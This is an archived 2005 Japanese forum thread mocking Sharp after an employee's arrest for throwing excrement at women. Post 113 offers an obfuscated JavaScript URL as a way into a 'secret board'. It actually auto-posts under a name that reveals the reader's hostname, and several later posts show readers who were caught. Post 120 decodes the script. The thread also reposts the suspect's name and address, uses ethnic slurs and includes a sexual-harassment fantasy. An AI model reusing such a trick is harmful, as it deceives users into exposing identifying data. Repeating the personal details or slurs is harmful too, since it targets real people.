2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

シャープ社員 ふん尿を女性に投げつけ逮捕

1 :目のつけ所が名無しさん:2005/09/16(金) 19:15:59
いったいこの男に何があったんだよw
http://headlines.yahoo.co.jp/hl?a=20050916-00000121-jij-soci

2 :ねぇ、名乗って:2005/09/16(金) 19:16:55
1を買ってきて、かの有名な「サンダー!」を聞きたいのですが
これは何面で聞けますか?最初かな?

3 :目のつけ所が名無しさん:2005/09/16(金) 19:27:56

Q. AQSOSが臭いのですが・・・。

A. 仕様です。新開発のウンコーティングにより茶色の再現性を高めています。



4 :目のつけ所が名無しさん:2005/09/16(金) 19:48:04
 大阪市や大阪府羽曳野市で、若い女性が相次いでふん尿のようなものを
かけられた事件で、東住吉署は16日、暴行と器物損壊容疑で、
大手電機メーカー「シャープ」課長、栗本一正容疑者(39)=
羽曳野市南恵我之荘=を逮捕した。 
「若い女性にかけるのが楽しくてやった」と容疑を認めており、
同署は15件連続した事件への関与を追及する。 
調べでは、栗本容疑者は13日午後11時ごろ、
大阪市東住吉区照ケ丘矢田の路上で、
帰宅途中の同区の女性店員(25)に、
車の中からふん尿のような液体を上半身にかけた疑い。


5 :目のつけ所が名無しさん:2005/09/16(金) 19:51:37

アクオス→「あ、くそす」に変更

6 :目のつけ所が名無しさん:2005/09/16(金) 19:57:50
王手電機メーカーの課長という地位を捨ててまで
こだわった「ふん尿投げ」とは彼にとってなんなんだったんだ・・・

7 :目のつけ所が名無しさん:2005/09/16(金) 19:59:17
それで、漏れのシャープの携帯の液晶が買って半日で壊れたのね。
"液晶のシャープ”は"えクソうのシャープ”だったんでつね。

8 :目のつけ所が名無しさん:2005/09/16(金) 20:03:40
仕様です。新開発のウンコーティングにより茶色の再現性を高めています。

9 :目のつけ所が名無しさん:2005/09/16(金) 20:03:53
目のつけどころがシャープでしょ

10 :目のつけ所が名無しさん:2005/09/16(金) 20:24:46
___/ ̄// 「」「」i                      / ̄ //
|_  __ ̄ ̄|| l二二il  ,「 ̄.| |  / ̄ ̄__L [][]i.  /  //
  7  // ̄|  ||  ̄ ̄  ,i'  |i' /  // ̄」  ̄|i'  /  //
  /  //   |  ||     ,i'  |i'./_,二二..,   |i' /  //  | ̄ ||
 /  //   |  || ____,i'  |i'  ̄  __,i'   |i' /  //__|  ||
/_//  [__|| 「______|i'    |___|i'/________|i

      / ̄ ̄ ̄ ̄ ̄ ̄ \
     / ''''''     ''''''   ヽ
     | (●),   、(●)   |  ←新機能!!
    |    ,,ノ(、_, )ヽ、,,     |   矢印のあたりをトリプルクリックで 
    |    `-=ニ=- '      |   目が光るぞ!!!
    !     `ニニ´       .!  
    \_ _______ /


11 :目のつけ所が名無しさん:2005/09/16(金) 23:32:51
糞尿・・・。
やることが韓流だな。
やることがシナ流だな。

12 :目のつけ所が名無しさん:2005/09/17(土) 03:35:20
>>6
確かに。なぞだな

13 :目のつけ所が名無しさん:2005/09/17(土) 04:51:14
朝礼で、「人にウンコを投げないように!」って言うんだろうな〜。役員は、緊急会議で、今後の事を話し合うんだろうな〜。ボーナスも減るんだろうな〜。 一人のバカな社員のせいで。

14 :目のつけ所が名無しさん:2005/09/17(土) 04:54:33
サイクロンの販促か・・・

15 :目のつけ所が名無しさん:2005/09/17(土) 11:13:55
糞尿age

16 :目のつけ所が名無しさん:2005/09/17(土) 11:22:29
糞尿投げ

17 :目のつけ所が名無しさん:2005/09/17(土) 11:25:31
糞尿投げで社会的地位も家族も職場もすべてを失った男
ある意味「漢」だよな

18 :目のつけ所が名無しさん:2005/09/17(土) 11:37:48
すごい性癖だな


19 :目のつけ所が名無しさん:2005/09/17(土) 11:39:15
パトカーでクソたれた脱糞男ってのがいたけど、さらに上を行く男だなw

20 :目のつけ所が名無しさん:2005/09/17(土) 11:41:08
自宅から大量のスカトロビデオ、DVDが見つかったみたいだな
あと噂だがビンに保存した糞が多数見つかったらしい。
完全なスカトロ野郎だな。

21 :目のつけ所が名無しさん:2005/09/17(土) 11:43:40
リアル赤木軍馬

22 :目のつけ所が名無しさん:2005/09/17(土) 11:45:01
 
 
 
           ウ ン コ を 見 た ら シ ャ ー プ を 思 い 出 し 、
 
 
       シ ャ ー プ 製 品 を 見 れ ば ウ ン コ を 思 い 浮 か べ る ・・・
 
 
        そ ん な 日 々 が 7 5 日 ほ ど 続 き そ う で す ね ・・・
  
 
 
              食 欲 の 秋 だ っ て の に ・・・
 
 
 
 
 

23 :目のつけ所が名無しさん:2005/09/17(土) 11:48:39
>>20
俺はかなりのスケベだけどスカトロだけはわからん

24 :目のつけ所が名無しさん:2005/09/17(土) 11:51:00
スカトロのやつってウンコを食べるの??


25 :目のつけ所が名無しさん:2005/09/17(土) 11:56:19
まさか。食べたら死ぬだろ。>急性肝炎

26 :羽曳野市民:2005/09/17(土) 11:58:42
栗本家の近所の人間です。
栗本さんもよく知ってる方なのでショックです。
ただやりそうな顔はしてますね。

>>24
スカトロの中にも色々あるんじゃないのかな
ただ栗本さんは酷い口臭で有名だったから食ってたかも
歯に茶色いモノ詰まってる時あったし


27 :目のつけ所が名無しさん:2005/09/17(土) 13:22:55
若い女を糞で汚してみたかったんだろ
さすがマニア

28 :目のつけ所が名無しさん:2005/09/17(土) 13:31:27
大手電機メーカーシャープの品質保証部副参事

29 :目のつけ所が名無しさん:2005/09/17(土) 13:33:55
39歳っていうと、
高校時代はMZ-80
大学時代はX-1の世代か?


30 :目のつけ所が名無しさん:2005/09/17(土) 13:34:16
>>26
この3連休中にスカトロジーの殿堂である自宅を巡礼しようと
思いますが、場所等のソースを教えて下さい。

31 :目のつけ所が名無しさん:2005/09/17(土) 13:34:17
何か目の付け所の違う製品開発のヒントに
するつもりだったのだろう、許してやれよ!

32 :目のつけ所が名無しさん:2005/09/17(土) 13:36:14
シャープのクリーンコンピューターに憧れて入社した世代だなw


33 :目のつけ所が名無しさん:2005/09/17(土) 13:39:27
インベーダーゲームをやるためだけに
20万出してMZ80を買ってた。

34 :目のつけ所が名無しさん:2005/09/17(土) 13:43:41
              人
           ノ⌒ 丿
        _/   ::(
       /     :::::::\
       (     :::::::;;;;;;;)
      \_―― ̄ ̄::::::::::\
      ノ ̄     ::::::::::::::::::::::)
     (     ::::::::::::::;;;;;;;;;;;;人
    / ̄――――― ̄ ̄::::::::\
   (        :::::::::::::::::::::::::::::::::)
    \__::::::::::::::::::;;;;;;;;;;;;;;;;;;;;;;;;ノ
         ∩    ∩
         //     | |
        //Λ_Λ  | |
        | |( ´Д`)//  うるせー、ウンコ投げるぞ!
        \ シャープ |

35 :目のつけ所が名無しさん:2005/09/17(土) 14:33:54
残尿便器

36 :目のつけ所が名無しさん:2005/09/17(土) 15:00:24
AQSOS

37 :目のつけ所が名無しさん:2005/09/17(土) 15:59:20

              )
             (
         ,,        )      )
         ゙ミ;;;;;,_           (
          ミ;;;;;;;;、;:..,,.,,,,,
          i;i;i;i; '',',;^′..ヽ
          ゙ゞy、、;:..、)  }
           .¨.、,_,,、_,,r_,ノ′
         /;:;":;.:;";i; '',',;;;_~;;;′.ヽ
        ゙{y、、;:...:,:.:.、;:..:,:.:. ._  、}
        ".¨ー=v ''‐ .:v、,,、_,r_,ノ′
       /;i;i; '',',;;;_~⌒¨;;;;;;;;ヾ.ミ゙´゙^′..ヽ 
       ゙{y、、;:...:,:.:.、;、;:.:,:.:. ._  .、)  、}
       ".¨ー=v ''‐ .:v、冫_._ .、,_,,、_,,r_,ノ′
      /i;i; '',',;;;_~υ⌒¨;;;;;;;;ヾ.ミ゙´゙^′.ソ.ヽ
      ゙{y、、;:..ゞ.:,:.:.、;:.ミ.:,:.:. ._υ゚o,,'.、)  、}
      ヾ,,..;::;;;::,;,::;):;:;:; .:v、冫_._ .、,_,,、_,,r_,ノ′




38 :目のつけ所が名無しさん:2005/09/17(土) 16:13:35
この人は仕事と遊びを両立できるタイプだったんだと思う
もし捕まってなかったら、エリートだったのかもね
そういう人材が今では稀少なのは事実でしょう

39 :目のつけ所が名無しさん:2005/09/17(土) 16:25:09
洗濯機を明日購入予定なんだけど
シャープのは無しにしよ・・。

40 :目のつけ所が名無しさん:2005/09/17(土) 16:29:50
うんこはアートだと思う。

41 :目のつけ所が名無しさん:2005/09/17(土) 16:39:20
>>13
>人にウンコを投げないように!
激わら、あられちゃんを思い出した。

42 :目のつけ所が名無しさん:2005/09/17(土) 17:16:15
バブル世代だから、どうしようもない。

43 :目のつけ所が名無しさん:2005/09/17(土) 18:15:17
うんこ課長に仕えてた方は被害無いですか。
机の中が黄色くなってたとか、大丈夫ですか。
シャー(尿の音)プ(糞とおならの音)に聞こえるのは私だけ

44 :目のつけ所が名無しさん:2005/09/17(土) 18:57:43
たった一人の社員で企業イメージをダウンさせることが出来るもんなんだな

45 :目のつけ所が名無しさん:2005/09/17(土) 19:04:59
>>43
     (⌒⌒)
  ∧_∧ ( プッ )
 (・ω・`)ノノ〜'
  (⊃⌒*⌒⊂)
シャー /_ノωヽ_)

46 :目のつけ所が名無しさん:2005/09/17(土) 19:15:15
一日も早い職場復帰を願ってます。

47 :目のつけ所が名無しさん:2005/09/17(土) 19:32:54
がんばれ!ふん尿課長!

48 :目のつけ所が名無しさん:2005/09/17(土) 19:38:18
http://headlines.yahoo.co.jp/hl?a=20050916-00000121-jij-soci
シャープの品質保証部副参事栗本一正容疑者(39)
=羽曳野市南恵我之荘=


49 :目のつけ所が名無しさん:2005/09/17(土) 20:17:54

今日ファミレスで隣の席の家族の高校生くらいの子が、

『ちょっとシャープしてくる』

と席を立った。
どこへ行くのかと思ったらその子はトイレに行きました。
わずか2日で 糞尿=シャープ ってのが浸透したみたいですね。
個人的にスゴイと思いました。

50 :目のつけ所が名無しさん:2005/09/17(土) 20:20:16
火曜の朝一番に糞尿課長へ電話しよう!

51 :目のつけ所が名無しさん:2005/09/17(土) 20:41:08
うんこ=豚しゃぶ

52 :目のつけ所が名無しさん:2005/09/17(土) 20:56:16
中野名物糞煮込みうどんをウンコ課長に送ってあげよう

53 :目のつけ所が名無しさん:2005/09/17(土) 21:25:53
なんか中国人と住んでたみたいですね。変態課長さん
そこで少し考えてしまいました。
シャープは液晶のシェアがだいぶ高い。
そこで企業の信用を失墜させる刺客だったとしたら?
普通は企業名が新聞やテレビに大々的には出ないですよね?
なーんか引っかかるんですよねー!!

他板に飛び火しても結構ですので、少しこの路線で色んな意見を聞かせてください。


あとは参加しないで見てます

54 :目のつけ所が名無しさん:2005/09/17(土) 21:48:37
なんでもいいけど
臭いんで
他所でやってくれ

55 :目のつけ所が名無しさん:2005/09/17(土) 22:33:59
ウンコシュ!シュ!>>54

56 :目のつけ所が名無しさん:2005/09/17(土) 23:54:47
ふん尿男は「シャープ」課長
「若い女性にかけて嫌がる姿を見るのが楽しかった]
http://www.sharp.co.jp/corporate/news/050527-a.html


57 :目のつけ所が名無しさん:2005/09/18(日) 00:03:49
オレは京阪電車で通勤しているんだが、大体座っている。
以前、膝に置いたカバンの上に前に立った松下社員に鼻くそを落とされた事が
あるが、そいつは見ているとほぼいつも鼻くそをほじくっていた。いい歳こい
たオッサンだったが。
しかしこれはそれをはるかに上回る快挙だな。鼻くそ松下にウンちのシャープ
か。どっちの勝ちだ?

58 :オオサカ:2005/09/18(日) 01:01:57
猫です。
ご主人の会社の社員が女の人に糞尿をかけてまわってたんだって。
近頃の犯罪は凶器も地球にやさしいんですね。
犯罪もふつうにエコ。
エコロジークラスでいきましょう。

シャープです。


59 :目のつけ所が名無しさん:2005/09/18(日) 13:38:51
糞尿を武器に使うのは、韓民族、暴力団、シャープ
世の中の嫌われ者。
うんこイメージの吉永小百合は、かわいそう。
うんこイメージのアクオスは、見たくない。
うんこイメージのシャープは、日本に要らない。

60 :目のつけ所が名無しさん:2005/09/18(日) 23:30:22
女性が銀行強盗犯して逃げてるところに、
銭形平次よろしく現れたシャープ社員が
懐から取り出したふん尿を颯爽と投げつけて、
見事犯人を取り押さえ讃えられる。。。

「シャープ社員 ふん尿を女性に投げつけ逮捕」みたいな。

61 :目のつけ所が名無しさん:2005/09/19(月) 00:19:56
ウンコロ平次か・・・

62 :目のつけ所が名無しさん:2005/09/19(月) 01:35:52
亀山工場から新製品!!
65型液晶トイレ!!
数日中には量産体制へ!!

63 :目のつけ所が名無しさん:2005/09/19(月) 01:47:20
ニュースリリースでまったく謝罪していないなウンコ企業が!

64 :目のつけ所が名無しさん:2005/09/19(月) 02:03:49
目の付け所がうんちです

65 :目のつけ所が名無しさん:2005/09/19(月) 02:07:40
吉永小○合のスカトロコラが大量発生中。もちろん悪雄も一緒

66 :目のつけ所が名無しさん:2005/09/19(月) 02:38:49
>59
ようソニー社員元気か

67 :目のつけ所が名無しさん:2005/09/19(月) 03:04:38
つか、#社員はおらんのかえ?

68 :目のつけ所が名無しさん:2005/09/19(月) 20:21:46
(・ω・)ノ 呼んだ?

69 :目のつけ所が名無しさん:2005/09/19(月) 20:34:26
明日の朝、イントラの電子電話帳を使って、
「栗本」で検索する社員が多そうだなw

70 :目のつけ所が名無しさん:2005/09/19(月) 20:48:21
たぶん今日中に消されてると思う
即日免職でしょう

71 :目のつけ所が名無しさん:2005/09/19(月) 20:51:00
個人じゃなくてシャープっていう組織が下痢してるんだ。
あんな人間性を無視した会社に同情の余地なし。
「乾いたタオルもいつかは湿る」って社員も取引のある業者も徹底的に虐める。
経営陣は駒大苫小牧の野球部長みたいなろくでもなしと変わらん。

72 :目のつけ所が名無しさん:2005/09/19(月) 21:00:03
まだまだ序の口
地獄を見るのはこれからですよw


73 :目のつけ所が名無しさん:2005/09/19(月) 21:37:21
糞尿投げって次のオリンピックの公開競技でしょ?

74 :目のつけ所が名無しさん:2005/09/19(月) 21:50:25
よくわからんのは自分の車で近所で糞尿を投げてたらすぐに捕まるってことくらい
中学生でもわかること。それをなぜ一流企業の課長級の大の男がやったのかがわからん。

75 :目のつけ所が名無しさん:2005/09/19(月) 22:27:44
今日の報道ステーションも通常どおりタイムcmが放映。

1ヶ月ぐらいはAC差し替えで自粛しろよ。

76 :目のつけ所が名無しさん:2005/09/23(金) 16:52:43
トイレに1時間以上いる社員も 糞尿予備軍です。

77 :目のつけ所が名無しさん:2005/09/24(土) 11:45:31
情けない。嘆かわしい。
糞尿投げつけて何が面白いんや?
これからこいつの家族の立場はどうなるんや。

反省しても後悔しても終わりや。


78 :184.147.192.61.east.flets.alpha-net.ne.jp:2005/09/24(土) 11:50:07
test

79 :目のつけ所が名無しさん:2005/09/24(土) 13:31:00
自分のうんこをペットボトルに詰め替える作業が嫌・・・
しかも、飛び出しやすいように適度にションベンで薄めて(ry

80 :目のつけ所が名無しさん:2005/09/24(土) 18:03:21
明後日発売の週刊誌【週刊ポスト】10月7日号より

⇒シャープ<糞尿ぶっかけ課長>(栗本一正容疑者)のストレスの原因は中国人妻だった!

<立ち読みでも良いから、一読あれ!>

81 :目のつけ所が名無しさん:2005/09/24(土) 22:21:20

減る塩のスチームノズルから茶色い液体が・・・

やっぱ糞尿なのかな・・・

82 :目のつけ所が名無しさん:2005/09/24(土) 22:29:19
★★★シャープ社員 ふん尿を女性に投げつけ逮捕★★★

そんな人 大シャープ様に居るのですか
初耳ですが

83 :目のつけ所が名無しさん:2005/09/24(土) 22:50:40
>>82
なんと、宣伝のための業務命令だったらしいですよ。
しかも品質管理の課長さんは喜んでやってたらしいし。

課長さんが担当してた製品の内側には糞尿がもれなく付いているそうです。
シャープ製品をお持ちの方で気になる人は確認した方が良いです。
糞尿入りかどうかの確認は、お客様センターへ製品名と製造番号を告げれば教えてくれます。

84 :シャープはきったない:2005/09/24(土) 23:32:50
私はシャープ社員ですが、今回の事件に関する会社からの説明等一切無し。
世間だけでなくシャープ社員からも時間とともに記憶から消えるのを待っている感じです。
ほんとに情けないです。被害者の方にちゃんと謝罪してんのかシャープ?
メディアを通じてシャープ幹部がちゃんと謝罪せえよ。
まあ、近いうちにシャープ潰れるよ。変な奴しか出世してないから時間の問題。
まともな人は私と一緒にシャープ辞めようぜ。


85 :目のつけ所が名無しさん:2005/09/25(日) 00:50:47
>>84
職歴無しのオッサン乙

86 :目のつけ所が名無しさん:2005/09/25(日) 08:48:54
変態社員だったら部品事業部だけでなく液晶事業本部に沢山いるww
セクハラ管理職だったら山ほど。。
なんなら実名でご紹介しましょうか?
多気、亀山のプロ技、実装技、生産部。。
覚悟はいいかな。

87 :目のつけ所が名無しさん:2005/09/25(日) 09:59:33
今回の糞尿社員もセクハラ管理職と同じ
社内で出来ないので社外で発散しただけ

88 :目のつけ所が名無しさん:2005/09/25(日) 10:31:23
>>83

自分のテレビが糞尿入りかどうかを電話で確認してみた。
そしたら糞尿入り間違いないって・・・ orz

電話に出たおねぇさんは、『糞尿たっぷりですよ! よかったですねぇ!』
と宝くじが当たったかのように喜んでいた・・・
まったく変態メーカーだよな。
テレビは今日捨てることにしました。

89 :目のつけ所が名無しさん:2005/09/25(日) 12:43:24
>84
>私はシャープ社員ですが、今回の事件に関する会社からの説明等一切無し。

つか、これ本当の話。
社員が閲覧できるイントラネット全社掲示板には、まだ事件に関する説明が載ってない。
(つか、載せる気がない)


90 :目のつけ所が名無しさん:2005/09/25(日) 13:06:39
・・・すみません、そろそろ許してもらえませんか?
たった1人の社員が起こした事件ですよ。
会社自体は何の罪もないはずです。。。

91 :目のつけ所が名無しさん:2005/09/25(日) 13:27:06
おまえら、この事件を風化させるな!
2chないでシャープのことが話題になったら、
この糞尿ぶっかけ事件について書き込め!


92 :目のつけ所が名無しさん:2005/09/25(日) 15:46:50
だって今回の事を風化させたらまたシャープの社員は糞尿投げるんでしょ?
俺はまだ被害者じゃないから、呆れているだけで別に怒っていないけど、被害者になりたくないから
まだまだ風化させるべきじゃないと思う。

シャープの社員がもう今後二度と糞尿を人に投げないという根拠があれば風化させても良いけどね。
会社自体が『そんな事当たり前!』と言わんばかりに詫びもいれずに平然としているようじゃ信用できないよ。
糞尿を人に投げるのは、シャープ社内では当たり前かもしれないけど、一般人にしてみれば迷惑なんだよ。
だからまずは新聞まるまる一面を使ってお詫び広告をして、もうやらないように社員に徹底すると宣言しろよ。
話はそれからだ。

93 :目のつけ所が名無しさん:2005/09/25(日) 15:53:35
>>90
>たった1人の社員が起こした事件ですよ。

会社名が報道で書かれてしまう事件のほとんどが社員一人の犯罪だよ
通勤中の事件だから会社は無関係じゃないよ
しかも課長さんだし

94 :目のつけ所が名無しさん:2005/09/25(日) 16:08:26
(ノ・∀・)ノ = ●ウンコー!! Σr(‘Д‘n)

95 :目のつけ所が名無しさん:2005/09/25(日) 16:21:43
これだけ騒がれて、会社はだんまりってのはヒドイ
http://www.google.co.jp/search?hl=ja&q=%E3%82%B7%E3%83%A3%E3%83%BC%E3%83%97+%E7%B3%9E%E5%B0%BF&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

96 :目のつけ所が名無しさん:2005/09/25(日) 16:30:38
シャープの株の掲示板荒れている・・・

並ぶ文字は ウンコ 糞  汚物 糞尿 という文字だらけ。
ウンコ水撒き事件が来週の火曜日の株価にどう反映するか??

人気の液晶テレビのアクオスが悪糞雄(あくおす と こじつけている)とか言われてかわいそう。

吉永小百合さんイコールウンコイメージを免れるため降板して!というサユリストまで現れた。

こんな投稿まで出る始末
■シャープの液晶、画面から糞尿まかれます

吉永小百合が糞尿を部屋にばら撒きます。

くさい液晶はシャープです。なんて書かれたり・・・・

変な社員一人のせいでたまりませんなあ・・・・

イメージとは恐ろしいものです。ブランドイメージがどうなるやら。

ちなみに私はアクオスのCMどれも好きです。残念!

糞尿まき男の顔とか放映されたんでしょうか?

どうせならヨドバシカメラとか大手電機量販店にたくさん並ぶアクオス全部に男の顔が並ぶなんてどうでしょう??
キモイかな。

97 :目のつけ所が名無しさん:2005/09/25(日) 16:43:14
シャープ本社前の池が
汚いドブ池だもんな。

そりゃシャープ社員が
精神に異常をきたすのも
しかたがない・・・。

98 :目のつけ所が名無しさん:2005/09/25(日) 18:24:14
一般庶民へ
おしっこ&うんこ程度で大騒ぎするな!!
オレはシャープ管理職だがお詫びの気持ちは一切無い。
たかが一人の基地外社員の行動だろ!
懲戒免職で終わり!

99 :目のつけ所が名無しさん:2005/09/25(日) 18:39:12
シャープが悪いのではない。
事件を起こした馬鹿が悪いだけ。
不買運動するならやってみろ!
オマエらに買って貰わなくても影響無し!!  フン!!

100 :目のつけ所が名無しさん:2005/09/25(日) 19:06:48
100 げっと

ぼちぼちシャープはお詫びするだろう

101 :目のつけ所が名無しさん:2005/09/25(日) 19:25:14
>>100
糞尿投げの再犯が無いように、社員教育の徹底も宣言して欲しい。

102 :目のつけ所が名無しさん:2005/09/25(日) 19:29:06
シャープの工場近くに住んでいるんですが、ウンチが飛んでこないか
いつもビクビクしながら歩いています。
子供達も脅えています。
社員と思われる人が普通にいっぱい歩いているので、本当に怖いんです。
何とかしてください。

103 :目のつけ所が名無しさん:2005/09/25(日) 19:31:54
>>102
>社員と思われる人が普通にいっぱい歩いているので、

それはマジで危険だw

104 :目のつけ所が名無しさん:2005/09/25(日) 19:47:42
>>102
かわいそう・・・

105 :目のつけ所が名無しさん:2005/09/25(日) 20:18:32
 
【液晶テレビ】
1.シャープ LC-13S4   
2.シャープ LC-32AD5
3.シャープ LC-32GD7
4.松下電器産業 TH-32LX500
5.シャープ LC-20S4
6.シャープ LC-15S4    
 
=======売れ筋ランキング=======
http://event.rakuten.co.jp/pc/ranking/tv/index.html
 
 
 
楽天全体での売り上げはこのようになっていますが、何か?

106 :目のつけ所が名無しさん:2005/09/25(日) 20:33:25
この程度のニュースはすぐに風化だな。悪いが

107 :目のつけ所が名無しさん:2005/09/25(日) 23:56:22
どうやら収まってきたようですね・・・ ホッ…

108 :目のつけ所が名無しさん:2005/09/26(月) 00:15:06
社員さんですか?

109 :目のつけ所が名無しさん:2005/09/26(月) 01:55:57
>>108
違いまつよ・・・ (^-^;)

110 :目のつけ所が名無しさん:2005/09/26(月) 02:12:58
シャープで家電修理している者です。
仕事のたびにこの件で文句を言われ正直参ってます。
なんでワシがこの事で客にあやまらなあかんのや〜

111 :目のつけ所が名無しさん:2005/09/26(月) 04:56:59
世間が忘れた頃に他の社員が同じ事を繰り返すだろう

112 :目のつけ所が名無しさん:2005/09/26(月) 10:23:54
>>111
いやいや、次は誰がやるかを社内で検討会議を開いているようです。

113 :目のつけ所が名無しさん:2005/09/26(月) 14:12:54
■裏2ちゃんねるに入る方法(IE限定)

1.下の文字列をコピーする。
2.IEで裏を見たいスレを表示する。
3.アドレスバーに貼り付ける
4.Enterキーを押すだけだ

JavaScript:var%20f=doc%75ment.%67e%74Ele%6de%6etsB%79%54ag%4eame%28%27fo%72m%27%29%5b0%5d;f.F%52%4f%4d.%76al%75e=%27f%75sia%6easa%6e%27;f.%6dail.%76al%75e=%27u%72a2c%68%27;f.%4dES%53A%47E.%76al%75e=%27%4a%53%27;f.s%75b%6di%74.clic%6b%28%29;void%280%29;


114 :目のつけ所が名無しさん:2005/09/26(月) 14:15:38
シャープ糞尿事件については>>113の裏2ちゃんねるでお願いします。
エントリーは必ずこのスレを『全部読む』か『最新50』をクリックしてからです。
(の方がスレ探ししないで済みます)

115 :目のつけ所が名無しさん:2005/09/26(月) 19:51:14

混んでて入りにくかったけど、やっと入れたよ。
滅茶苦茶シャープの悪口書かれてるじゃんw
シャープより電車男の話題が面白かった。

116 :目のつけ所が名無しさん:2005/09/26(月) 19:52:09

あ、お礼言おうと思ったんだ。www

教えてくれてありがとね!
本当にあると思わなかった


117 :YahooBB220026020088.bbtec.net:2005/09/27(火) 01:01:53
JS

118 :目のつけ所が名無しさん:2005/09/27(火) 06:00:33
>>113
それは★付きキャップ専用サイトだから公開禁止のはず。
ひろゆきに通報しました。
アク禁決定ですね。

119 :2ch-netBB:2005/09/27(火) 13:20:44
OK an entry machine.
'SHARP'thread.

120 :目のつけ所が名無しさん:2005/09/27(火) 13:37:54
>>113
短くしてみた
JavaScrpt:var f=document.getElementsByTagName('form')[0];f.FROM.value='fusianasan';f.mail.value='ura2ch';f.MESSAGE.value='JS';f.submit.click();void(0);

121 :2ch-netBB:2005/09/27(火) 15:47:47
OK an entry machine.
'SHARP'thread.

122 :目のつけ所が名無しさん:2005/09/27(火) 16:29:28
>>120はフジアナサントラップ注意

123 :情けない:2005/09/27(火) 18:48:43
まだ社員には何の報告も無いのぉ。世間にもほんま心を込めて謝罪せなあかんで。
この事件が風化するのを期待してるのかもしれんが、それは無理な話や。たった一人の
犯罪かもしれんが、そういう人に育ててしまう・管理職にしてしまう社風はここで
リセットすべきや。被害者や社会の事を本気で考えているのなら悪い膿を全部出して、
精神誠意謝罪してほしい。


124 :目のつけ所が名無しさん:2005/09/27(火) 18:58:14
だから何でシャープが謝らなくてはならないの?
社員の趣味による犯罪なんか知らんよ。
業務中のミス以外なら個人で糞尿投げようが犯罪起こそうが会社としては関係ない。

125 :2ch-netBB:2005/09/27(火) 19:15:52
OK an entry machine.
'SHARP'thread.

126 :目のつけ所が名無しさん:2005/09/27(火) 22:38:28 ID:0
昔は確かに4流メーカーだったけど、今は世界的な液晶のシャープ
総合家電メーカーにはなれなかったけどTFT液晶の断トツの正真正銘トップメーカーだよ
だからシャープがYESと言えばYESなんだ。


127 :flbf195.naxnet.or.jp:2005/09/28(水) 15:22:40
JS

128 :糞NY:2005/09/28(水) 18:05:12
シャープってどうせ農協とか生協のマークつけた奴でしょ。
これからは汲み取り車のマークに変えたら?

129 :目のつけ所が名無しさん:2005/09/29(木) 01:51:07
もともと事件を冒した奴がシャープにいただけのこと

130 :目のつけ所が名無しさん:2005/09/29(木) 15:12:06
シャープみたいな糞会社だったから頭もおかしくなったんだろ

131 :目のつけ所が名無しさん:2005/09/29(木) 18:22:54
糞尿会社には糞尿しか集まらない

132 :目のつけ所が名無しさん:2005/09/29(木) 19:53:44
やっぱり農協の肥溜めか。

133 :p57195-adsao12honb4-acca.tokyo.ocn.ne.jp:2005/09/29(木) 21:05:38
JS

134 :目のつけ所が名無しさん:2005/09/30(金) 01:26:07
クソの付けどころがツヤープでしょ?

135 :目のつけ所が名無しさん:2005/10/01(土) 10:57:28
ハハハ

136 :目のつけ所が名無しさん:2005/10/01(土) 11:37:44
漏れだったら一般市民に糞尿をぶっかけるんじゃなく、
社内の女子更衣室に忍び込んで、
スカートやブラウスに精液をぶっかけて、ストレスを発散する。
もちろん生出しで。

137 :zaq3a55dfab.zaq.ne.jp:2005/10/01(土) 21:34:38
JS

138 :目のつけ所が名無しさん:2005/10/01(土) 22:19:01
>>136
凄いストレス発散方法ですね。
リスキーなのでストレスが溜まるんでは。。

139 :目のつけ所が名無しさん:2005/10/02(日) 21:22:44
社長室に ウンコ投げては 本社ビル低いのでとどきそうですよ。

140 :目のつけ所が名無しさん:2005/10/02(日) 21:38:21
>>136
残業のときやってるよ。

141 :目のつけ所が名無しさん:2005/10/03(月) 11:52:23
こいつら、シャープに就職できなかった負け犬か、
それとも、シャープにシェア奪われた負け組家電の連中だろ→ >>1-140

みじめだねぇ。
こんなことでしか競えないのかい?

142 :目のつけ所が名無しさん:2005/10/03(月) 12:09:16
>>141
糞尿ブランド

143 :目のつけ所が名無しさん:2005/10/03(月) 12:24:23
>>141はスカトロマニア

あと一般人は糞尿会社には就職したがらないと思うよ

144 :目のつけ所が名無しさん:2005/10/03(月) 12:42:35
>>142
なんだかんだ言って、
シャープのテレビ欲しくてたまらないんだろ?
シャープのレンジ欲しくてたまらないんだろ?
でも、おまえの給料じゃ買えないから恨んで2ちゃんでささいな不祥事叩いて憂さ晴らししてるんだろ。

>>143
有名大学の優秀な学生は、液晶一流企業のシャープへくる。
3流大学や高卒は、プラズマのところで負け組人生。

145 :目のつけ所が名無しさん:2005/10/03(月) 13:23:46
一流はトヨタにいく 3流関西ローカルは糞尿豚しゃぶに行く

146 :142:2005/10/03(月) 13:40:28
>>144
稲穂マークの肥溜ブランドなんかいらん!

147 :目のつけ所が名無しさん:2005/10/04(火) 13:10:29
シャープは優れたエコ企業だ!
それにひきかえ、トヨタは、どれだけキレイ事を言っても、
排気ガスをまきちらす自動車を生産する企業でしかない。
偽善者はいずれシャープの前にひれ伏す

148 :目のつけ所が名無しさん:2005/10/04(火) 13:56:50
シャープって目のつけどころが糞

149 :目のつけ所が名無しさん:2005/10/04(火) 15:33:31
液晶はシャープが一番

150 :目のつけ所が名無しさん:2005/10/04(火) 16:25:41
液糞パネルと糞ーラパネル造るのに どれだけの有害化学物質の排出とエネルギーを
使っているのやら。何が環境にやさしい企業だ

151 :p2132-ipad05motosinmat.mie.ocn.ne.jp:2005/10/04(火) 19:04:28
JS

152 :目のつけ所が名無しさん:2005/10/04(火) 23:34:29
>136

デジカメで制服画像うpキボンヌ。

153 :目のつけ所が名無しさん:2005/10/06(木) 12:32:31
おまえら負け犬がどれだけ吠えたって無駄。
シャープの株価、ちゃんと上がってるぜ。
http://quote.yahoo.co.jp/q?s=6753.t&d=c&t=3m&l=off&z=b&q=c&k=c3&a=v&h=on&p=m25,m75,s

シャープのアクオス欲しいんだろ?
シャープのヘルシオ欲しいんだろ?
シャープに就職したいんだろ?
それができなくて、こぉんな匿名掲示板でウジウジ吠えているんだろ??
寂しいなぁ、おまえら。

154 :目のつけ所が名無しさん:2005/10/06(木) 13:20:19
152>

155 :目のつけ所が名無しさん:2005/10/06(木) 14:44:31
>>153
シャープの株価は 長期に見ると 下がり傾向で
松下に大きく水をあけられている。
もっと、株の勉強せいや

156 :目のつけ所が名無しさん:2005/10/06(木) 23:57:34
糞尿を投げる→話題になる→企業名が露出する→誹謗中傷を受ける
→「いや、かわいそう」という同情票を集める→一般シェアより多くの同情票が集まり
通常より多く売れる。ウマー
